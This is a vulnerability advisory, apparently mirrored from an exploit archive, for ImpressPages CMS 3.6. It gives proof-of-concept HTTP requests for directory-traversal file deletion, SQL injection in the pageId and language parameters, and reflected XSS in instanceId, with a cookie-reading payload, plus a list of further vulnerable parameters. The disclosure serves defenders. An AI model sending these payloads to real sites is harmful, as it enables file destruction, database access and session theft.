ImpressPages CMS 3.6 Multiple Vulnerabilities

🗓️ 01 Nov 2013 00:00:00Reported by LiquidWormType
zdt🔗 0day.today👁 29 Views
ImpressPages CMS 3.6 file deletion and SQL injection vulnerabilitie
ImpressPages CMS v3.6 Remote Arbitrary File Deletion Vulnerability


Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6

Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.

Desc: Input passed to the 'files[0][file]' parameter in 
'/ip_cms/modules/administrator/repository/controller.php'
is not properly sanitised before being used to delete files.
This can be exploited to delete files with the permissions
of the web server via directory traversal sequences passed
within the affected POST parameter.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2
           PHP 5.4.7
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5158
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5158.php

Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/



12.10.2013

--


POST /impresspages/ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 387
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a

==================================

SQL Injection: (pageId param)

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1


==================================

SQL Injection: (language param)

POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 404
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe
Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="language"

344'
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_security_code"

9f1ff00ea8fd9fd8f2d421ba5ec45a18
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_rand_name"

lib_php_form_standard_2_
------WebKitFormBoundarybBHOjmAcICeilnDe--


==================================

Reflected XSS POST parameters:

- files[0][file]
- instanceId
- pageOptions[buttonTitle]
- pageOptions[createdOn]
- pageOptions[description]
- pageOptions[keywords]
- pageOptions[lastModified]
- pageOptions[layout]
- pageOptions[pageTitle]
- pageOptions[redirectURL]
- pageOptions[rss]
- pageOptions[type]
- pageOptions[url]
- pageOptions[visible]
- revisionId
- widgetName
- pageSize[0]
- page[0]
- road[]


==================================

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 155
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>

...

#  0day.today [2018-01-03]  #
01 Nov 2013 00:00Current
7.9High risk
Vulners AI Score7.9